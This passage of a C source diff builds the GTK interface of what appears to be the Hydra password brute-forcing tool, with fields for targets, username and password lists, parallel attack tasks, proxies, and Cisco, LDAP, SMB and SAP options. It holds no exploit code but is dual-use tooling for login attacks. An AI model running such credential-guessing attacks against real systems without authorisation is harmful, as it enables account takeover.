gtk_widget_show(label6); + gtk_table_attach(GTK_TABLE(table8), label6, 0, 1, 3, 4, (GtkAttachOptions) (GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions) (GTK_EXPAND), 0, 0); + gtk_misc_set_alignment(GTK_MISC(label6), 0, 0.5); + + + chkIPV6 = gtk_check_button_new_with_mnemonic("Prefer IPV6"); + gtk_widget_set_name(chkIPV6, "chkIPV6"); + gtk_widget_show(chkIPV6); + gtk_table_attach(GTK_TABLE(table8), chkIPV6, 0, 2, 2, 3, (GtkAttachOptions) (GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions) (GTK_EXPAND), 0, 0); + gtk_tooltips_set_tip(tooltips, chkIPV6, "Enable to use IPV6", NULL); + + radioTarget2 = gtk_radio_button_new_with_mnemonic(NULL, "Target List"); + gtk_widget_set_name(radioTarget2, "radioTarget2"); + gtk_widget_show(radioTarget2); + gtk_table_attach(GTK_TABLE(table8), radioTarget2, 0, 1, 1, 2, (GtkAttachOptions) (GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions) (GTK_EXPAND), 0, 0); + gtk_radio_button_set_group(GTK_RADIO_BUTTON(radioTarget2), radioTarget2_group); + radioTarget2_group = gtk_radio_button_get_group(GTK_RADIO_BUTTON(radioTarget2)); + + entTargetFile = gtk_entry_new(); + gtk_widget_set_name(entTargetFile, "entTargetFile"); + gtk_widget_show(entTargetFile); + gtk_table_attach(GTK_TABLE(table8), entTargetFile, 1, 2, 1, 2, (GtkAttachOptions) (GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions) (GTK_EXPAND), 0, 0); + gtk_tooltips_set_tip(tooltips, entTargetFile, "A file which contains the targets to attack. One entry per line. IP\naddresses and/or DNS names.", NULL); + + entTarget = gtk_entry_new(); + gtk_widget_set_name(entTarget, "entTarget"); + gtk_widget_show(entTarget); + gtk_table_attach(GTK_TABLE(table8), entTarget, 1, 2, 0, 1, (GtkAttachOptions) (GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions) (GTK_EXPAND), 0, 0); + gtk_tooltips_set_tip(tooltips, entTarget, "The target to attack - DNS name or IP address", NULL); + gtk_entry_set_text(GTK_ENTRY(entTarget), "127.0.0.1"); + + radioTarget1 = gtk_radio_button_new_with_mnemonic(NULL, "Single Target"); + gtk_widget_set_name(radioTarget1, "radioTarget1"); + gtk_widget_show(radioTarget1); + gtk_table_attach(GTK_TABLE(table8), radioTarget1, 0, 1, 0, 1, (GtkAttachOptions) (GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions) (GTK_EXPAND), 0, 0); + gtk_radio_button_set_group(GTK_RADIO_BUTTON(radioTarget1), radioTarget2_group); + radioTarget2_group = gtk_radio_button_get_group(GTK_RADIO_BUTTON(radioTarget1)); + gtk_toggle_button_set_active(GTK_TOGGLE_BUTTON(radioTarget1), TRUE); + + label28 = gtk_label_new("Target"); + gtk_widget_set_name(label28, "label28"); + gtk_widget_show(label28); + gtk_frame_set_label_widget(GTK_FRAME(frame11), label28); + + frame12 = gtk_frame_new(NULL); + gtk_widget_set_name(frame12, "frame12"); + gtk_widget_show(frame12); + gtk_box_pack_start(GTK_BOX(vbox5), frame12, TRUE, TRUE, 0); + + table9 = gtk_table_new(2, 2, FALSE); + gtk_widget_set_name(table9, "table9"); + gtk_widget_show(table9); + gtk_container_add(GTK_CONTAINER(frame12), table9); + + chkVerbose = gtk_check_button_new_with_mnemonic("Be Verbose"); + gtk_widget_set_name(chkVerbose, "chkVerbose"); + gtk_widget_show(chkVerbose); + gtk_table_attach(GTK_TABLE(table9), chkVerbose, 1, 2, 0, 1, (GtkAttachOptions) (GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions) (GTK_EXPAND), 0, 0); + gtk_tooltips_set_tip(tooltips, chkVerbose, "be verbose", NULL); + + chkDebug = gtk_check_button_new_with_mnemonic("Debug"); + gtk_widget_set_name(chkDebug, "chkDebug"); + gtk_widget_show(chkDebug); + gtk_table_attach(GTK_TABLE(table9), chkDebug, 1, 2, 1, 2, (GtkAttachOptions) (GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions) (GTK_EXPAND), 0, 0); + gtk_tooltips_set_tip(tooltips, chkDebug, "Enable debug mode", NULL); + + chkAttempts = gtk_check_button_new_with_mnemonic("Show Attempts"); + gtk_widget_set_name(chkAttempts, "chkAttempts"); + gtk_widget_show(chkAttempts); + gtk_table_attach(GTK_TABLE(table9), chkAttempts, 0, 1, 1, 2, (GtkAttachOptions) (GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions) (GTK_EXPAND), 0, 0); + gtk_tooltips_set_tip(tooltips, chkAttempts, "Show attempts", NULL); + + chkSSL = gtk_check_button_new_with_mnemonic("Use SSL"); + gtk_widget_set_name(chkSSL, "chkSSL"); + gtk_widget_show(chkSSL); + gtk_table_attach(GTK_TABLE(table9), chkSSL, 0, 1, 0, 1, (GtkAttachOptions) (GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions) (GTK_EXPAND), 0, 0); + gtk_tooltips_set_tip(tooltips, chkSSL, "Enable to use SSL (the target must have SSL enabled!", NULL); + + label29 = gtk_label_new("Output Options"); + gtk_widget_set_name(label29, "label29"); + gtk_widget_show(label29); + gtk_frame_set_label_widget(GTK_FRAME(frame12), label29); + + label1 = gtk_label_new("Target"); + gtk_widget_set_name(label1, "label1"); + gtk_widget_show(label1); + gtk_notebook_set_tab_label(GTK_NOTEBOOK(ntbMain), gtk_notebook_get_nth_page(GTK_NOTEBOOK(ntbMain), 0), label1); + + vbox2 = gtk_vbox_new(FALSE, 0); + gtk_widget_set_name(vbox2, "vbox2"); + gtk_widget_show(vbox2); + gtk_container_add(GTK_CONTAINER(ntbMain), vbox2); + + frmUsername = gtk_frame_new(NULL); + gtk_widget_set_name(frmUsername, "frmUsername"); + gtk_widget_show(frmUsername); + gtk_box_pack_start(GTK_BOX(vbox2), frmUsername, TRUE, TRUE, 0); + + table2 = gtk_table_new(3, 2, FALSE); + gtk_widget_set_name(table2, "table2"); + gtk_widget_show(table2); + gtk_container_add(GTK_CONTAINER(frmUsername), table2); + + entUsernameFile = gtk_entry_new(); + gtk_widget_set_name(entUsernameFile, "entUsernameFile"); + gtk_widget_show(entUsernameFile); + gtk_table_attach(GTK_TABLE(table2), entUsernameFile, 1, 2, 1, 2, (GtkAttachOptions) (GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions) (GTK_EXPAND | GTK_SHRINK), 0, 0); + gtk_tooltips_set_tip(tooltips, entUsernameFile, "File with user logins, one entry per line", NULL); + + entUsername = gtk_entry_new(); + gtk_widget_set_name(entUsername, "entUsername"); + gtk_widget_show(entUsername); + gtk_table_attach(GTK_TABLE(table2), entUsername, 1, 2, 0, 1, (GtkAttachOptions) (GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions) (GTK_EXPAND | GTK_SHRINK), 0, 0); + gtk_tooltips_set_tip(tooltips, entUsername, "The login to use", NULL); + gtk_entry_set_text(GTK_ENTRY(entUsername), "yourname"); + + radioUsername1 = gtk_radio_button_new_with_mnemonic(NULL, "Username"); + gtk_widget_set_name(radioUsername1, "radioUsername1"); + gtk_widget_show(radioUsername1); + gtk_table_attach(GTK_TABLE(table2), radioUsername1, 0, 1, 0, 1, (GtkAttachOptions) (GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions) (GTK_EXPAND | GTK_SHRINK), 0, 0); + gtk_radio_button_set_group(GTK_RADIO_BUTTON(radioUsername1), radioUsername1_group); + radioUsername1_group = gtk_radio_button_get_group(GTK_RADIO_BUTTON(radioUsername1)); + gtk_toggle_button_set_active(GTK_TOGGLE_BUTTON(radioUsername1), TRUE); + + radioUsername2 = gtk_radio_button_new_with_mnemonic(NULL, "Username List"); + gtk_widget_set_name(radioUsername2, "radioUsername2"); + gtk_widget_show(radioUsername2); + gtk_table_attach(GTK_TABLE(table2), radioUsername2, 0, 1, 1, 2, (GtkAttachOptions) (GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions) (GTK_EXPAND | GTK_SHRINK), 0, 0); + gtk_radio_button_set_group(GTK_RADIO_BUTTON(radioUsername2), radioUsername1_group); + radioUsername1_group = gtk_radio_button_get_group(GTK_RADIO_BUTTON(radioUsername2)); + + chkUsernameLoop = gtk_check_button_new_with_mnemonic("Loop around users"); + gtk_widget_set_name(chkUsernameLoop, "chkUsernameLoop"); + gtk_widget_show(chkUsernameLoop); + gtk_table_attach(GTK_TABLE(table2), chkUsernameLoop, 0, 2, 2, 3, (GtkAttachOptions) (GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions) (GTK_EXPAND), 0, 0); + gtk_tooltips_set_tip(tooltips, chkUsernameLoop, "Enable this option to loop around users not passwords", NULL); + + label8 = gtk_label_new("Username"); + gtk_widget_set_name(label8, "label8"); + gtk_widget_show(label8); + gtk_frame_set_label_widget(GTK_FRAME(frmUsername), label8); + + frmPass = gtk_frame_new(NULL); + gtk_widget_set_name(frmPass, "frmPass"); + gtk_widget_show(frmPass); + gtk_box_pack_start(GTK_BOX(vbox2), frmPass, TRUE, TRUE, 0); + + table3 = gtk_table_new(2, 2, FALSE); + gtk_widget_set_name(table3, "table3"); + gtk_widget_show(table3); + gtk_container_add(GTK_CONTAINER(frmPass), table3); + + entPassFile = gtk_entry_new(); + gtk_widget_set_name(entPassFile, "entPassFile"); + gtk_widget_show(entPassFile); + gtk_table_attach(GTK_TABLE(table3), entPassFile, 1, 2, 1, 2, (GtkAttachOptions) (GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions) (GTK_EXPAND | GTK_SHRINK), 0, 0); + gtk_tooltips_set_tip(tooltips, entPassFile, "File with passwords to try, one entry per line", NULL); + + entPass = gtk_entry_new(); + gtk_widget_set_name(entPass, "entPass"); + gtk_widget_show(entPass); + gtk_table_attach(GTK_TABLE(table3), entPass, 1, 2, 0, 1, (GtkAttachOptions) (GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions) (GTK_EXPAND | GTK_SHRINK), 0, 0); + gtk_tooltips_set_tip(tooltips, entPass, "The password to try", NULL); + gtk_entry_set_text(GTK_ENTRY(entPass), "yourpass"); + + radioPass1 = gtk_radio_button_new_with_mnemonic(NULL, "Password"); + gtk_widget_set_name(radioPass1, "radioPass1"); + gtk_widget_show(radioPass1); + gtk_table_attach(GTK_TABLE(table3), radioPass1, 0, 1, 0, 1, (GtkAttachOptions) (GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions) (GTK_EXPAND | GTK_SHRINK), 0, 0); + gtk_radio_button_set_group(GTK_RADIO_BUTTON(radioPass1), radioPass1_group); + radioPass1_group = gtk_radio_button_get_group(GTK_RADIO_BUTTON(radioPass1)); + gtk_toggle_button_set_active(GTK_TOGGLE_BUTTON(radioPass1), TRUE); + + radioPass2 = gtk_radio_button_new_with_mnemonic(NULL, "Password List"); + gtk_widget_set_name(radioPass2, "radioPass2"); + gtk_widget_show(radioPass2); + gtk_table_attach(GTK_TABLE(table3), radioPass2, 0, 1, 1, 2, (GtkAttachOptions) (GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions) (GTK_EXPAND | GTK_SHRINK), 0, 0); + gtk_radio_button_set_group(GTK_RADIO_BUTTON(radioPass2), radioPass1_group); + radioPass1_group = gtk_radio_button_get_group(GTK_RADIO_BUTTON(radioPass2)); + + labelpass = gtk_label_new("Password"); + gtk_widget_set_name(labelpass, "labelpass"); + gtk_widget_show(labelpass); + gtk_frame_set_label_widget(GTK_FRAME(frmPass), labelpass); + + frame8 = gtk_frame_new(NULL); + gtk_widget_set_name(frame8, "frame8"); + gtk_widget_show(frame8); + gtk_box_pack_start(GTK_BOX(vbox2), frame8, TRUE, TRUE, 0); + + table5 = gtk_table_new(1, 2, FALSE); + gtk_widget_set_name(table5, "table5"); + gtk_widget_show(table5); + gtk_container_add(GTK_CONTAINER(frame8), table5); + + chkColon = gtk_check_button_new_with_mnemonic("Use Colon separated file"); + gtk_widget_set_name(chkColon, "chkColon"); + gtk_widget_show(chkColon); + gtk_table_attach(GTK_TABLE(table5), chkColon, 0, 1, 0, 1, (GtkAttachOptions) (GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions) (GTK_EXPAND), 0, 0); + gtk_tooltips_set_tip(tooltips, chkColon, "\"Enable this option to use a colon file for login/password attempts", NULL); + + entColonFile = gtk_entry_new(); + gtk_widget_set_name(entColonFile, "entColonFile"); + gtk_widget_show(entColonFile); + gtk_table_attach(GTK_TABLE(table5), entColonFile, 1, 2, 0, 1, (GtkAttachOptions) (GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions) (GTK_EXPAND), 0, 0); + gtk_tooltips_set_tip(tooltips, entColonFile, "The colon file to use, each line has to be structured like \"mylogin:mypass\"", NULL); + + label20 = gtk_label_new("Colon separated file"); + gtk_widget_set_name(label20, "label20"); + gtk_widget_show(label20); + gtk_frame_set_label_widget(GTK_FRAME(frame8), label20); + + table6 = gtk_table_new(1, 2, FALSE); + gtk_widget_set_name(table6, "table6"); + gtk_widget_show(table6); + gtk_box_pack_start(GTK_BOX(vbox2), table6, TRUE, TRUE, 0); + + chkPassLogin = gtk_check_button_new_with_mnemonic("Try login as password"); + gtk_widget_set_name(chkPassLogin, "chkPassLogin"); + gtk_widget_show(chkPassLogin); + gtk_table_attach(GTK_TABLE(table6), chkPassLogin, 0, 1, 0, 1, (GtkAttachOptions) (GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions) (GTK_EXPAND), 0, 0); + gtk_tooltips_set_tip(tooltips, chkPassLogin, "Enable this option to try the login as password, in addition to the password/file", NULL); + + chkPassNull = gtk_check_button_new_with_mnemonic("Try empty password"); + gtk_widget_set_name(chkPassNull, "chkPassNull"); + gtk_widget_show(chkPassNull); + gtk_table_attach(GTK_TABLE(table6), chkPassNull, 1, 2, 0, 1, (GtkAttachOptions) (GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions) (GTK_EXPAND), 0, 0); + gtk_tooltips_set_tip(tooltips, chkPassNull, "Enable this option to try an empty password, in addition to the password/file", NULL); + + label2 = gtk_label_new("Passwords"); + gtk_widget_set_name(label2, "label2"); + gtk_widget_show(label2); + gtk_notebook_set_tab_label(GTK_NOTEBOOK(ntbMain), gtk_notebook_get_nth_page(GTK_NOTEBOOK(ntbMain), 1), label2); + + table4 = gtk_table_new(2, 1, FALSE); + gtk_widget_set_name(table4, "table4"); + gtk_widget_show(table4); + gtk_container_add(GTK_CONTAINER(ntbMain), table4); + + frame9 = gtk_frame_new(NULL); + gtk_widget_set_name(frame9, "frame9"); + gtk_widget_show(frame9); + gtk_table_attach(GTK_TABLE(table4), frame9, 0, 1, 1, 2, (GtkAttachOptions) (GTK_EXPAND | GTK_SHRINK | GTK_FILL), (GtkAttachOptions) (GTK_EXPAND | GTK_SHRINK | GTK_FILL), 0, 0); + + table7 = gtk_table_new(5, 2, FALSE); + gtk_widget_set_name(table7, "table7"); + gtk_widget_show(table7); + gtk_container_add(GTK_CONTAINER(frame9), table7); + + label22 = gtk_label_new("Proxy "); + gtk_widget_set_name(label22, "label22"); + gtk_widget_show(label22); + gtk_table_attach(GTK_TABLE(table7), label22, 0, 1, 1, 2, (GtkAttachOptions) (GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions) (GTK_EXPAND), 0, 0); + gtk_misc_set_alignment(GTK_MISC(label22), 0, 0.5); + + entHTTPProxy = gtk_entry_new(); + gtk_widget_set_name(entHTTPProxy, "entHTTPProxy"); + gtk_widget_show(entHTTPProxy); + gtk_table_attach(GTK_TABLE(table7), entHTTPProxy, 1, 2, 1, 2, (GtkAttachOptions) (GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions) (GTK_EXPAND), 0, 0); + gtk_tooltips_set_tip(tooltips, entHTTPProxy, "The address of the proxy. Syntax: \"http://123.45.67.89:8080\"", NULL); + gtk_entry_set_text(GTK_ENTRY(entHTTPProxy), "http://127.0.0.1:8080"); + + chkProxyAuth = gtk_check_button_new_with_mnemonic("Proxy needs authentication"); + gtk_widget_set_name(chkProxyAuth, "chkProxyAuth"); + gtk_widget_show(chkProxyAuth); + gtk_table_attach(GTK_TABLE(table7), chkProxyAuth, 0, 1, 2, 3, (GtkAttachOptions) (GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions) (GTK_EXPAND), 0, 0); + gtk_tooltips_set_tip(tooltips, chkProxyAuth, "Enable this if the proxy requires authenticatio", NULL); + + label23 = gtk_label_new("Username"); + gtk_widget_set_name(label23, "label23"); + gtk_widget_show(label23); + gtk_table_attach(GTK_TABLE(table7), label23, 0, 1, 3, 4, (GtkAttachOptions) (GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions) (GTK_EXPAND), 0, 0); + gtk_misc_set_alignment(GTK_MISC(label23), 0, 0.5); + + entProxyUser = gtk_entry_new(); + gtk_widget_set_name(entProxyUser, "entProxyUser"); + gtk_widget_show(entProxyUser); + gtk_table_attach(GTK_TABLE(table7), entProxyUser, 1, 2, 3, 4, (GtkAttachOptions) (GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions) (GTK_EXPAND), 0, 0); + gtk_tooltips_set_tip(tooltips, entProxyUser, "The user name for proxy authentication", NULL); + gtk_entry_set_text(GTK_ENTRY(entProxyUser), "yourname"); + + label24 = gtk_label_new("Password"); + gtk_widget_set_name(label24, "label24"); + gtk_widget_show(label24); + gtk_table_attach(GTK_TABLE(table7), label24, 0, 1, 4, 5, (GtkAttachOptions) (GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions) (GTK_EXPAND), 0, 0); + gtk_misc_set_alignment(GTK_MISC(label24), 0, 0.5); + + entProxyPass = gtk_entry_new(); + gtk_widget_set_name(entProxyPass, "entProxyPass"); + gtk_widget_show(entProxyPass); + gtk_table_attach(GTK_TABLE(table7), entProxyPass, 1, 2, 4, 5, (GtkAttachOptions) (GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions) (GTK_EXPAND), 0, 0); + gtk_tooltips_set_tip(tooltips, entProxyPass, "The password for proxy authentication", NULL); + gtk_entry_set_text(GTK_ENTRY(entProxyPass), "yourpass"); + + label26 = gtk_label_new(""); + gtk_widget_set_name(label26, "label26"); + gtk_widget_show(label26); + gtk_table_attach(GTK_TABLE(table7), label26, 1, 2, 2, 3, (GtkAttachOptions) (GTK_FILL), (GtkAttachOptions) (0), 0, 0); + gtk_misc_set_alignment(GTK_MISC(label26), 0, 0.5); + + hbox3 = gtk_hbox_new(FALSE, 0); + gtk_widget_set_name(hbox3, "hbox3"); + gtk_widget_show(hbox3); + gtk_table_attach(GTK_TABLE(table7), hbox3, 0, 2, 0, 1, (GtkAttachOptions) (GTK_EXPAND | GTK_SHRINK | GTK_FILL), (GtkAttachOptions) (GTK_EXPAND | GTK_FILL), 0, 0); + + radioProxy = gtk_radio_button_new_with_mnemonic(NULL, "No Proxy"); + gtk_widget_set_name(radioProxy, "radioProxy"); + gtk_widget_show(radioProxy); + gtk_box_pack_start(GTK_BOX(hbox3), radioProxy, TRUE, TRUE, 0); + gtk_radio_button_set_group(GTK_RADIO_BUTTON(radioProxy), radioProxy_group); + radioProxy_group = gtk_radio_button_get_group(GTK_RADIO_BUTTON(radioProxy)); + gtk_toggle_button_set_active(GTK_TOGGLE_BUTTON(radioProxy), TRUE); + + radioProxy2 = gtk_radio_button_new_with_mnemonic(NULL, "HTTP Method"); + gtk_widget_set_name(radioProxy2, "radioProxy2"); + gtk_widget_show(radioProxy2); + gtk_box_pack_start(GTK_BOX(hbox3), radioProxy2, TRUE, TRUE, 0); + gtk_tooltips_set_tip(tooltips, radioProxy2, "Enable this to use a proxy for scanning ( Only for HTTP Module )", NULL); + gtk_radio_button_set_group(GTK_RADIO_BUTTON(radioProxy2), radioProxy_group); + radioProxy_group = gtk_radio_button_get_group(GTK_RADIO_BUTTON(radioProxy2)); + + radioProxy3 = gtk_radio_button_new_with_mnemonic(NULL, "CONNECT Method"); + gtk_widget_set_name(radioProxy3, "radioProxy3"); + gtk_widget_show(radioProxy3); + gtk_box_pack_start(GTK_BOX(hbox3), radioProxy3, TRUE, TRUE, 0); + gtk_tooltips_set_tip(tooltips, radioProxy3, "Enable this to use a proxy for scanning", NULL); + gtk_radio_button_set_group(GTK_RADIO_BUTTON(radioProxy3), radioProxy_group); + radioProxy_group = gtk_radio_button_get_group(GTK_RADIO_BUTTON(radioProxy3)); + + label21 = gtk_label_new("Use a HTTP/HTTPS Proxy"); + gtk_widget_set_name(label21, "label21"); + gtk_widget_show(label21); + gtk_frame_set_label_widget(GTK_FRAME(frame9), label21); + + frame13 = gtk_frame_new(NULL); + gtk_widget_set_name(frame13, "frame13"); + gtk_widget_show(frame13); + gtk_table_attach(GTK_TABLE(table4), frame13, 0, 1, 0, 1, (GtkAttachOptions) (GTK_FILL), (GtkAttachOptions) (GTK_EXPAND | GTK_FILL), 0, 0); + + table10 = gtk_table_new(3, 2, FALSE); + gtk_widget_set_name(table10, "table10"); + gtk_widget_show(table10); + gtk_container_add(GTK_CONTAINER(frame13), table10); + + chkExitf = gtk_check_button_new_with_mnemonic("Exit after first found pair"); + gtk_widget_set_name(chkExitf, "chkExitf"); + gtk_widget_show(chkExitf); + gtk_table_attach(GTK_TABLE(table10), chkExitf, 0, 2, 2, 3, (GtkAttachOptions) (GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions) (GTK_EXPAND), 0, 0); + gtk_tooltips_set_tip(tooltips, chkExitf, "Enable this to stop all attacking processes once a valid login/password pair is found", NULL); + + spnTimeout_adj = gtk_adjustment_new(30, 0, 295, 1, 10, 0); + spnTimeout = gtk_spin_button_new(GTK_ADJUSTMENT(spnTimeout_adj), 1, 0); + gtk_widget_set_name(spnTimeout, "spnTimeout"); + gtk_widget_show(spnTimeout); + gtk_table_attach(GTK_TABLE(table10), spnTimeout, 1, 2, 1, 2, (GtkAttachOptions) (GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions) (GTK_EXPAND), 0, 0); + gtk_tooltips_set_tip(tooltips, spnTimeout, "The maximum timeout an attack process is waiting for a response from the target", NULL); + + spnTasks_adj = gtk_adjustment_new(16, 0, 128, 1, 10, 0); + spnTasks = gtk_spin_button_new(GTK_ADJUSTMENT(spnTasks_adj), 1, 0); + gtk_widget_set_name(spnTasks, "spnTasks"); + gtk_widget_show(spnTasks); + gtk_table_attach(GTK_TABLE(table10), spnTasks, 1, 2, 0, 1, (GtkAttachOptions) (GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions) (GTK_EXPAND), 0, 0); + gtk_tooltips_set_tip(tooltips, spnTasks, "The number of attack tasks to run in parallel. The more the faster, the most: computer lockup :-) 16-64 is a good choice", NULL); + + label32 = gtk_label_new("Timeout"); + gtk_widget_set_name(label32, "label32"); + gtk_widget_show(label32); + gtk_table_attach(GTK_TABLE(table10), label32, 0, 1, 1, 2, (GtkAttachOptions) (GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions) (GTK_EXPAND), 0, 0); + gtk_misc_set_alignment(GTK_MISC(label32), 0, 0.5); + + label31 = gtk_label_new("Number of Tasks"); + gtk_widget_set_name(label31, "label31"); + gtk_widget_show(label31); + gtk_table_attach(GTK_TABLE(table10), label31, 0, 1, 0, 1, (GtkAttachOptions) (GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions) (GTK_EXPAND), 0, 0); + gtk_misc_set_alignment(GTK_MISC(label31), 0, 0.5); + + label30 = gtk_label_new("Performance Options"); + gtk_widget_set_name(label30, "label30"); + gtk_widget_show(label30); + gtk_frame_set_label_widget(GTK_FRAME(frame13), label30); + + label3 = gtk_label_new("Tuning"); + gtk_widget_set_name(label3, "label3"); + gtk_widget_show(label3); + gtk_notebook_set_tab_label(GTK_NOTEBOOK(ntbMain), gtk_notebook_get_nth_page(GTK_NOTEBOOK(ntbMain), 2), label3); + + vbox4 = gtk_vbox_new(FALSE, 0); + gtk_widget_set_name(vbox4, "vbox4"); + gtk_widget_show(vbox4); + gtk_container_add(GTK_CONTAINER(ntbMain), vbox4); + + frame10 = gtk_frame_new(NULL); + gtk_widget_set_name(frame10, "frame10"); + gtk_widget_show(frame10); + gtk_box_pack_start(GTK_BOX(vbox4), frame10, TRUE, TRUE, 0); + + entHTTPProxyURL = gtk_entry_new(); + gtk_widget_set_name(entHTTPProxyURL, "entHTTPProxyURL"); + gtk_widget_show(entHTTPProxyURL); + gtk_container_add(GTK_CONTAINER(frame10), entHTTPProxyURL); + gtk_tooltips_set_tip(tooltips, entHTTPProxyURL, "URL to connect to via the proxy", NULL); + gtk_entry_set_text(GTK_ENTRY(entHTTPProxyURL), "www.suse.com"); + + label27 = gtk_label_new("http-proxy url / http-proxy-urlenum credential module"); + gtk_widget_set_name(label27, "label27"); + gtk_widget_show(label27); + gtk_frame_set_label_widget(GTK_FRAME(frame10), label27); + + frame3 = gtk_frame_new(NULL); + gtk_widget_set_name(frame3, "frame3"); + gtk_widget_show(frame3); + gtk_box_pack_start(GTK_BOX(vbox4), frame3, TRUE, TRUE, 0); + + entHTTPURL = gtk_entry_new(); + gtk_widget_set_name(entHTTPURL, "entHTTPURL"); + gtk_widget_show(entHTTPURL); + gtk_container_add(GTK_CONTAINER(frame3), entHTTPURL); + gtk_tooltips_set_tip(tooltips, entHTTPURL, "The protected URL you want to access", NULL); + gtk_entry_set_text(GTK_ENTRY(entHTTPURL), "/foo/bar/protected.html"); + + label15 = gtk_label_new("http / https url"); + gtk_widget_set_name(label15, "label15"); + gtk_widget_show(label15); + gtk_frame_set_label_widget(GTK_FRAME(frame3), label15); + + frame4 = gtk_frame_new(NULL); + gtk_widget_set_name(frame4, "frame4"); + gtk_widget_show(frame4); + gtk_box_pack_start(GTK_BOX(vbox4), frame4, TRUE, TRUE, 0); + + entCiscoPass = gtk_entry_new(); + gtk_widget_set_name(entCiscoPass, "entCiscoPass"); + gtk_widget_show(entCiscoPass); + gtk_container_add(GTK_CONTAINER(frame4), entCiscoPass); + gtk_tooltips_set_tip(tooltips, entCiscoPass, "The password to the cisco device", NULL); + gtk_entry_set_text(GTK_ENTRY(entCiscoPass), "password"); + + label16 = gtk_label_new("Cisco Enable, Login for Cisco device"); + gtk_widget_set_name(label16, "label16"); + gtk_widget_show(label16); + gtk_frame_set_label_widget(GTK_FRAME(frame4), label16); + + frame5 = gtk_frame_new(NULL); + gtk_widget_set_name(frame5, "frame5"); + gtk_widget_show(frame5); + gtk_box_pack_start(GTK_BOX(vbox4), frame5, TRUE, TRUE, 0); + + entLDAPDN = gtk_entry_new(); + gtk_widget_set_name(entLDAPDN, "entLDAPDN"); + gtk_widget_show(entLDAPDN); + gtk_container_add(GTK_CONTAINER(frame5), entLDAPDN); + gtk_tooltips_set_tip(tooltips, entLDAPDN, "The DN scope of ldap to authenticate against", NULL); + gtk_entry_set_text(GTK_ENTRY(entLDAPDN), "dn-scope"); + + label17 = gtk_label_new("LDAP DN"); + gtk_widget_set_name(label17, "label17"); + gtk_widget_show(label17); + gtk_frame_set_label_widget(GTK_FRAME(frame5), label17); + + frame6 = gtk_frame_new(NULL); + gtk_widget_set_name(frame6, "frame6"); + gtk_widget_show(frame6); + gtk_box_pack_start(GTK_BOX(vbox4), frame6, TRUE, TRUE, 0); + + hbox2 = gtk_hbox_new(FALSE, 0); + gtk_widget_set_name(hbox2, "hbox2"); + gtk_widget_show(hbox2); + gtk_container_add(GTK_CONTAINER(frame6), hbox2); + + chkLocal = gtk_check_button_new_with_mnemonic("local accounts"); + gtk_widget_set_name(chkLocal, "chkLocal"); + gtk_widget_show(chkLocal); + gtk_box_pack_start(GTK_BOX(hbox2), chkLocal, TRUE, TRUE, 0); + gtk_tooltips_set_tip(tooltips, chkLocal, "Just attack local accounts", NULL); + + chkDomain = gtk_check_button_new_with_mnemonic("domain accounts"); + gtk_widget_set_name(chkDomain, "chkDomain"); + gtk_widget_show(chkDomain); + gtk_box_pack_start(GTK_BOX(hbox2), chkDomain, TRUE, TRUE, 0); + gtk_tooltips_set_tip(tooltips, chkDomain, "Attack domain and local accounts", NULL); + + chkNTLM = gtk_check_button_new_with_mnemonic("Interpret passes as NTLM hashes"); + gtk_widget_set_name(chkNTLM, "chkNTLM"); + gtk_widget_show(chkNTLM); + gtk_box_pack_start(GTK_BOX(hbox2), chkNTLM, FALSE, FALSE, 0); + gtk_tooltips_set_tip(tooltips, chkNTLM, "Interpret passes as NTML hashes", NULL); + + label18 = gtk_label_new("SMB"); + gtk_widget_set_name(label18, "label18"); + gtk_widget_show(label18); + gtk_frame_set_label_widget(GTK_FRAME(frame6), label18); + + frame7 = gtk_frame_new(NULL); + gtk_widget_set_name(frame7, "frame7"); + gtk_widget_show(frame7); + gtk_box_pack_start(GTK_BOX(vbox4), frame7, TRUE, TRUE, 0); + + spnSAPR3_adj = gtk_adjustment_new(1, 0, 99, 1, 10, 0); + spnSAPR3 = gtk_spin_button_new(GTK_ADJUSTMENT(spnSAPR3_adj), 1, 0); + gtk_widget_set_name(spnSAPR3, "spnSAPR3"); + gtk_widget_show(spnSAPR3); + gtk_container_add(GTK_CONTAINER(frame7), spnSAPR3); + gtk_tooltips_set_tip(tooltips, spnSAPR3, "The client id you want to attack, something between 0 and 99", NULL); + + label19 = gtk_label_new("sapr3 client id"); + gtk_widget_set_name(label19, "label19"); + gtk_widget_show(label19); + gtk_frame_set_label_widget(GTK_FRAME(frame7), label19); + + frame15 = gtk_frame_new(NULL); + gtk_widget_set_name(frame15, "frame15"); + gtk_widget_show(frame15); + gtk_box_pack_start(GTK_BOX(vbox4), frame15, TRUE, TRUE, 0); + + entCVS = gtk_entry_new(); + gtk_widget_set_name(entCVS, "entCVS"); + gtk_widget_show(entCVS); + gtk_container_add(GTK_CONTAINER(frame15), entCVS); + gtk_tooltips_set_tip(tooltips, entCVS, "Directory of the 